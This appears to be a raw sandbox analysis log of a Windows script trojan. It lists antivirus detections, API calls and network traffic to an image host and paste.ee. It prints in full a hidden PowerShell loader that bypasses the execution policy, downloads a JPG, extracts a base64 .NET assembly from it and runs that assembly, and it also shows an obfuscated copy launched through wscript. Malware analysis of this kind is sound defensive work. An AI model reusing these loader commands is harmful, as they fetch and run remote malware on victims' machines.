command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.SAgent.gen
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
Kingsoft Script.Trojan.SAgent.gen
ZoneAlarm HEUR:Trojan.Script.SAgent.gen
Rising Trojan.Undefined!8.1327C (TOPIS:E0:27pLkxQ5kpB)
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Wee=LÚñ1•4iÙä2‡Ÿ8„ÝzëDOWNGRD }[¢yb"è¦~©¨2ºìVnç¶Kì¼úMm2ÈÀ ÿ 
Data received Q
Data received ’
Data received ŽA4ûFÿ}¢6žœ´ÉVü§@žb˜ã©á+K,!ýÀ$*Ãæßç.á?N£#˜mÎÊd§8T¹–3ÍU@XŸ~G0E (Ñø¤ØïCtˆ$rÉ4Ddí~uªàZ–gcn!ÒFÈe?v#ýËv Éð·™vdP-Š’ê=93#W4i
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received jÚw{(àq‡ˆ›ƒ+áÜS¼g_†ˆóNw\µ5½³Bã$ÚÓ`·§ÁªCób
Data sent yuee=D:ûØâ"¾Aԑ_¨«™“,' îN`ŗ_Îín³/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAcÆVž®?g—Ò¼‹Æ ™ÿ_x4‚ûfOŽ, ¼´ž×øTÈ¥×ZEå׶¦š•ç¯YºÊ纫C÷²—Aµ0CcÛ •žíq¨U(Ph$ð=›z5 Ž}ËÝsxkµÂ‹Âw„ l<® ©*:%?
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: kgee=@¥Ë¡š®òHОAú ٍ¾YBBáãm”ƒ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 600
0 0

WSASend

 buffer: FBA]Yý;ÍöxÂÒ¥ÙDÓݬáèü/±RôOök”X® XŽ°¦ô©äPÿ>Z ‡ò’ü.Ӏè >h^0zwkO#¼€=ÌiØvûjaÌËèˆÂ³_ P6ÅQ&°fƒÌ¯… ÏÛØk06»
socket: 600
0 0

WSASend

 buffer: ÀYŸ– ٙÌ ·â™š*-#¢:¾ŽB”Þ·]vÔuÐ0ÚS0õg«|ZÑ΅2 P„2'ÎÐʇP¬Å'Öø“-„T“]Üܔ{ÕjVN2:ê0&éƒã`¦™F' ®´!݆«ÖPz·DñÓ®lhÁœõ§ëöáP#äo²æãQ´n pÓ[álÆxòpÜ9‡>Š½z:¯,ÛpߺCïÐv ys¢È:öÙÄ{s£G°^íÊg­7ûËB-~Ö
socket: 600
0 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: kgee=@¥Ë¡š®òHОAú ٍ¾YBBáãm”ƒ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 600
0 0

WSASend

 buffer: FBA]Yý;ÍöxÂÒ¥ÙDÓݬáèü/±RôOök”X® XŽ°¦ô©äPÿ>Z ‡ò’ü.Ӏè >h^0zwkO#¼€=ÌiØvûjaÌËèˆÂ³_ P6ÅQ&°fƒÌ¯… ÏÛØk06»
socket: 600
0 0

WSASend

 buffer: ÀYŸ– ٙÌ ·â™š*-#¢:¾ŽB”Þ·]vÔuÐ0ÚS0õg«|ZÑ΅2 P„2'ÎÐʇP¬Å'Öø“-„T“]Üܔ{ÕjVN2:ê0&éƒã`¦™F' ®´!݆«ÖPz·DñÓ®lhÁœõ§ëöáP#äo²æãQ´n pÓ[álÆxòpÜ9‡>Š½z:¯,ÛpߺCïÐv ys¢È:öÙÄ{s£G°^íÊg­7ûËB-~Ö
socket: 600
0 0

send

 buffer: yuee=D:ûØâ"¾Aԑ_¨«™“,' îN`ŗ_Îín³/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1444
sent: 126
1 126 0

send

 buffer: FBAcÆVž®?g—Ò¼‹Æ ™ÿ_x4‚ûfOŽ, ¼´ž×øTÈ¥×ZEå׶¦š•ç¯YºÊ纫C÷²—Aµ0CcÛ •žíq¨U(Ph$ð=›z5 Ž}ËÝsxkµÂ‹Âw„ l<® ©*:%?
socket: 1444
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2032
0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
parent_process wscript.exe martian_process powershell -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe